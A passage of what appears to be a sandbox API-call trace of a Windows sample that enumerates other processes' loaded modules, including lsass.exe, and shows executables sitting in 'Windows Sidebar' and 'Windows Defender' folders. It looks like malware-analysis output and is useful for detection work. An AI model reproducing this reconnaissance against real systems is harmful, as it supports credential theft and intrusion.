lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSASN1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")) returned 0x1e [0074.000] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e0) returned 0x214 [0074.000] EnumProcessModules (in: hProcess=0x214, lphModule=0x25175b8, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x25175b8, lpcbNeeded=0x23ee40) returned 1 [0074.001] GetModuleInformation (in: hProcess=0x214, hModule=0xff690000, lpmodinfo=0x2517828, cb=0x18 | out: lpmodinfo=0x2517828*(lpBaseOfDll=0xff690000, SizeOfImage=0x57000, EntryPoint=0xff6a3450)) returned 1 [0074.001] GetModuleBaseNameW (in: hProcess=0x214, hModule=0xff690000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="lsm.exe") returned 0x7 [0074.002] GetModuleFileNameExW (in: hProcess=0x214, hModule=0xff690000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\lsm.exe" (normalized: "c:\\windows\\system32\\lsm.exe")) returned 0x1b [0074.002] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x2519a10, cb=0x18 | out: lpmodinfo=0x2519a10*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0074.002] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0074.002] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0074.003] GetModuleInformation (in: hProcess=0x214, hModule=0x77710000, lpmodinfo=0x251bbd0, cb=0x18 | out: lpmodinfo=0x251bbd0*(lpBaseOfDll=0x77710000, SizeOfImage=0x11f000, EntryPoint=0x77725340)) returned 1 [0074.003] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77710000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="kernel32.dll") returned 0xc [0074.003] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77710000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0074.004] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd910000, lpmodinfo=0x251dda0, cb=0x18 | out: lpmodinfo=0x251dda0*(lpBaseOfDll=0x7fefd910000, SizeOfImage=0x6c000, EntryPoint=0x7fefd912780)) returned 1 [0074.004] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd910000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0074.005] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd910000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0074.005] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff100000, lpmodinfo=0x251ff70, cb=0x18 | out: lpmodinfo=0x251ff70*(lpBaseOfDll=0x7feff100000, SizeOfImage=0x9f000, EntryPoint=0x7feff1025a0)) returned 1 [0074.005] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff100000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0074.006] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff100000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")) returned 0x1e [0074.006] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefee80000, lpmodinfo=0x2522188, cb=0x18 | out: lpmodinfo=0x2522188*(lpBaseOfDll=0x7fefee80000, SizeOfImage=0x1f000, EntryPoint=0x7fefee860e8)) returned 1 [0074.007] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefee80000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0074.007] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefee80000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")) returned 0x1f [0074.008] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefdb50000, lpmodinfo=0x2524348, cb=0x18 | out: lpmodinfo=0x2524348*(lpBaseOfDll=0x7fefdb50000, SizeOfImage=0x12d000, EntryPoint=0x7fefdb9ed50)) returned 1 [0074.008] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefdb50000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0074.009] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefdb50000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RPCRT4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")) returned 0x1e [0074.010] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd1d0000, lpmodinfo=0x2526508, cb=0x18 | out: lpmodinfo=0x2526508*(lpBaseOfDll=0x7fefd1d0000, SizeOfImage=0xa000, EntryPoint=0x7fefd1d3b40)) returned 1 [0074.010] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd1d0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="SYSNTFY.dll") returned 0xb [0074.011] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd1d0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SYSNTFY.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll")) returned 0x1f [0074.011] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd1c0000, lpmodinfo=0x25286c8, cb=0x18 | out: lpmodinfo=0x25286c8*(lpBaseOfDll=0x7fefd1c0000, SizeOfImage=0x8000, EntryPoint=0x7fefd1c2a6c)) returned 1 [0074.012] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd1c0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="WMsgAPI.dll") returned 0xb [0074.013] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd1c0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WMsgAPI.dll" (normalized: "c:\\windows\\system32\\wmsgapi.dll")) returned 0x1f [0074.013] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd670000, lpmodinfo=0x252a920, cb=0x18 | out: lpmodinfo=0x252a920*(lpBaseOfDll=0x7fefd670000, SizeOfImage=0xf000, EntryPoint=0x7fefd671010)) returned 1 [0074.014] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd670000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0074.015] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd670000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTBASE.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")) returned 0x21 [0074.016] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefcc80000, lpmodinfo=0x252caf0, cb=0x18 | out: lpmodinfo=0x252caf0*(lpBaseOfDll=0x7fefcc80000, SizeOfImage=0xd000, EntryPoint=0x7fefcc81348)) returned 1 [0074.016] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefcc80000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="pcwum.dll") returned 0x9 [0074.017] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefcc80000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll")) returned 0x1d [0074.018] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd760000, lpmodinfo=0x252ecb0, cb=0x18 | out: lpmodinfo=0x252ecb0*(lpBaseOfDll=0x7fefd760000, SizeOfImage=0x14000, EntryPoint=0x7fefd7610e0)) returned 1 [0074.019] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd760000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="RpcRtRemote.dll") returned 0xf [0074.019] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd760000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")) returned 0x23 [0074.020] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd610000, lpmodinfo=0x2530e98, cb=0x18 | out: lpmodinfo=0x2530e98*(lpBaseOfDll=0x7fefd610000, SizeOfImage=0xb000, EntryPoint=0x7fefd611030)) returned 1 [0074.021] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd610000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="secur32.dll") returned 0xb [0074.022] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd610000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")) returned 0x1f [0074.023] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd640000, lpmodinfo=0x2533058, cb=0x18 | out: lpmodinfo=0x2533058*(lpBaseOfDll=0x7fefd640000, SizeOfImage=0x25000, EntryPoint=0x7fefd649658)) returned 1 [0074.024] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd640000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="SSPICLI.DLL") returned 0xb [0074.025] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd640000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SSPICLI.DLL" (normalized: "c:\\windows\\system32\\sspicli.dll")) returned 0x1f [0074.026] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefcc70000, lpmodinfo=0x2535218, cb=0x18 | out: lpmodinfo=0x2535218*(lpBaseOfDll=0x7fefcc70000, SizeOfImage=0xa000, EntryPoint=0x7fefcc73cb8)) returned 1 [0074.027] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefcc70000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="credssp.dll") returned 0xb [0074.028] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefcc70000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")) returned 0x1f [0074.029] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff430000, lpmodinfo=0x25373d8, cb=0x18 | out: lpmodinfo=0x25373d8*(lpBaseOfDll=0x7feff430000, SizeOfImage=0xdb000, EntryPoint=0x7feff450760)) returned 1 [0074.030] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff430000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0074.031] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff430000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ADVAPI32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0074.032] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb18) returned 0x214 [0074.032] EnumProcessModules (in: hProcess=0x214, lphModule=0x2539e68, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x2539e68, lpcbNeeded=0x23ee40) returned 1 [0074.032] GetModuleInformation (in: hProcess=0x214, hModule=0xb60000, lpmodinfo=0x253a0d8, cb=0x18 | out: lpmodinfo=0x253a0d8*(lpBaseOfDll=0xb60000, SizeOfImage=0x17000, EntryPoint=0xb614a1)) returned 1 [0074.033] GetModuleBaseNameW (in: hProcess=0x214, hModule=0xb60000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="3dftp.exe") returned 0x9 [0074.033] GetModuleFileNameExW (in: hProcess=0x214, hModule=0xb60000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Program Files\\Windows Sidebar\\3dftp.exe" (normalized: "c:\\program files\\windows sidebar\\3dftp.exe")) returned 0x2a [0074.033] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x253c2e8, cb=0x18 | out: lpmodinfo=0x253c2e8*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0074.033] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0074.034] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0074.034] GetModuleInformation (in: hProcess=0x214, hModule=0x75300000, lpmodinfo=0x253e4a8, cb=0x18 | out: lpmodinfo=0x253e4a8*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0074.034] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75300000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0074.035] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75300000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0074.035] GetModuleInformation (in: hProcess=0x214, hModule=0x752a0000, lpmodinfo=0x2540668, cb=0x18 | out: lpmodinfo=0x2540668*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0074.035] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x752a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0074.036] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x752a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0074.036] GetModuleInformation (in: hProcess=0x214, hModule=0x75290000, lpmodinfo=0x2542838, cb=0x18 | out: lpmodinfo=0x2542838*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0074.037] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75290000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0074.037] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75290000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0074.038] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa3c) returned 0x214 [0074.038] EnumProcessModules (in: hProcess=0x214, lphModule=0x2544f70, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x2544f70, lpcbNeeded=0x23ee40) returned 1 [0074.038] GetModuleInformation (in: hProcess=0x214, hModule=0x940000, lpmodinfo=0x25451e0, cb=0x18 | out: lpmodinfo=0x25451e0*(lpBaseOfDll=0x940000, SizeOfImage=0x17000, EntryPoint=0x9414a1)) returned 1 [0074.038] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x940000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="fpos.exe") returned 0x8 [0074.045] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x940000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Program Files\\Windows Defender\\fpos.exe" (normalized: "c:\\program files\\windows defender\\fpos.exe")) returned 0x2a [0074.045] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x25473f0, cb=0x18 | out: lpmodinfo=0x25473f0*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0074.046] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0074.046] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0074.046] GetModuleInformation (in: hProcess=0x214, hModule=0x75300000, lpmodinfo=0x25495b0, cb=0x18 | out: lpmodinfo=0x25495b0*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0074.047] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75300000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0074.047] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75300000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0074.048] GetModuleInformation (in: hProcess=0x214, hModule=0x752a0000, lpmodinfo=0x254b770, cb=0x18 | out: lpmodinfo=0x254b770*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0074.048] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x752a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0074.048] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x752a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0074.049] GetModuleInformation (in: hProcess=0x214, hModule=0x75290000, lpmodinfo=0x254d940, cb=0x18 | out: lpmodinfo=0x254d940*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0074.049] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75290000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0074.050] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75290000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0074.050] CloseHandle (hObject=0x214) returned 1 [0074.051] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d8) returned 0x214 [0074.052] EnumProcessModules (in: hProcess=0x214, lphModule=0x2550060, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x2550060, lpcbNeeded=0x23ee40) returned 1 [0074.055] GetModuleInformation (in: hProcess=0x214, hModule=0xff870000, lpmodinfo=0x25502d0, cb=0x18 | out: lpmodinfo=0x25502d0*(lpBaseOfDll=0xff870000, SizeOfImage=0xc000, EntryPoint=0xff871850)) returned 1 [0074.055] GetModuleBaseNameW (in: hProcess=0x214, hModule=0xff870000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="lsass.exe") returned 0x9 [0074.056] GetModuleFileNameExW (in: hProcess=0x214, hModule=0xff870000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\lsass.exe" (normalized: "c:\\windows\\system32\\lsass.exe")) returned 0x1d [0074.056] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x25524c8, cb=0x18 | out: lpmodinfo=0x25524c8*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0074.057] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0074.057] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0074.057] GetModuleInformation (in: hProcess=0x214, hModule=0x77710000, lpmodinfo=0x2554688, cb=0x18 | out: lpmodinfo=0x2554688*(lpBaseOfDll=0x77710000, SizeOfImage=0x11f000, EntryPoint=0x77725340)) returned 1 [0074.058] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77710000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="kernel32.dll") returned 0xc [0074.058] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77710000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0074.059] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd910000, lpmodinfo=0x2556858, cb=0x18 | out: lpmodinfo=0x2556858*(lpBaseOfDll=0x7fefd910000, SizeOfImage=0x6c000, EntryPoint=0x7fefd912780)) returned 1 [0074.059] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd910000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0074.060] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd910000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0074.060] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff100000, lpmodinfo=0x2558a28, cb=0x18 | out: lpmodinfo=0x2558a28*(lpBaseOfDll=0x7feff100000, SizeOfImage=0x9f000, EntryPoint=0x7feff1025a0)) returned 1 [0074.061] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff100000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0074.061] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff100000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")) returned 0x1e [0074.062] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefdb50000, lpmodinfo=0x255ac40, cb=0x18 | out: lpmodinfo=0x255ac40*(lpBaseOfDll=0x7fefdb50000, SizeOfImage=0x12d000, EntryPoint=0x7fefdb9ed50)) returned 1 [0074.062] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefdb50000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0074.063] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefdb50000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RPCRT4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")) returned 0x1e [0074.063] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd560000, lpmodinfo=0x255ce18, cb=0x18 | out: lpmodinfo=0x255ce18*(lpBaseOfDll=0x7fefd560000, SizeOfImage=0xb000, EntryPoint=0x7fefd561510)) returned 1 [0074.064] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd560000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="SspiSrv.dll") returned 0xb [0074.064] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd560000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SspiSrv.dll" (normalized: "c:\\windows\\system32\\sspisrv.dll")) returned 0x1f [0074.065] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd3f0000, lpmodinfo=0x255efd8, cb=0x18 | out: lpmodinfo=0x255efd8*(lpBaseOfDll=0x7fefd3f0000, SizeOfImage=0x16a000, EntryPoint=0x7fefd3f3e04)) returned 1 [0074.066] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd3f0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="lsasrv.dll") returned 0xa [0074.066] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd3f0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\lsasrv.dll" (normalized: "c:\\windows\\system32\\lsasrv.dll")) returned 0x1e [0074.067] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefee80000, lpmodinfo=0x2561198, cb=0x18 | out: lpmodinfo=0x2561198*(lpBaseOfDll=0x7fefee80000, SizeOfImage=0x1f000, EntryPoint=0x7fefee860e8)) returned 1 [0074.068] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefee80000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0074.068] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefee80000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")) returned 0x1f [0074.069] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd640000, lpmodinfo=0x25633f0, cb=0x18 | out: lpmodinfo=0x25633f0*(lpBaseOfDll=0x7fefd640000, SizeOfImage=0x25000, EntryPoint=0x7fefd649658)) returned 1 [0074.070] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd640000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="SspiCli.dll") returned 0xb [0074.070] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd640000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SspiCli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")) returned 0x1f [0074.071] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff430000, lpmodinfo=0x25655b0, cb=0x18 | out: lpmodinfo=0x25655b0*(lpBaseOfDll=0x7feff430000, SizeOfImage=0xdb000, EntryPoint=0x7feff450760)) returned 1 [0074.072] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff430000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0074.073] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff430000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ADVAPI32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0074.074] GetModuleInformation (in: hProcess=0x214, hModule=0x77610000, lpmodinfo=0x2567780, cb=0x18 | out: lpmodinfo=0x2567780*(lpBaseOfDll=0x77610000, SizeOfImage=0xfa000, EntryPoint=0x7762a2c8)) returned 1 [0074.074] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77610000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0074.075] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77610000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0074.076] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff1c0000, lpmodinfo=0x2569940, cb=0x18 | out: lpmodinfo=0x2569940*(lpBaseOfDll=0x7feff1c0000, SizeOfImage=0x67000, EntryPoint=0x7feff1cb03c)) returned 1 [0074.077] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff1c0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0074.078] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff1c0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GDI32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")) returned 0x1d [0074.079] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff350000, lpmodinfo=0x256bb00, cb=0x18 | out: lpmodinfo=0x256bb00*(lpBaseOfDll=0x7feff350000, SizeOfImage=0xe000, EntryPoint=0x7feff351080)) returned 1 [0074.080] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff350000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="LPK.dll") returned 0x7 [0074.081] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff350000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LPK.dll" (normalized: "c:\\windows\\system32\\lpk.dll")) returned 0x1b [0074.082] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff690000, lpmodinfo=0x256dcb0, cb=0x18 | out: lpmodinfo=0x256dcb0*(lpBaseOfDll=0x7feff690000, SizeOfImage=0xc9000, EntryPoint=0x7feff70a874)) returned 1 [0074.082] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff690000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="USP10.dll") returned 0x9 [0074.083] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff690000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USP10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")) returned 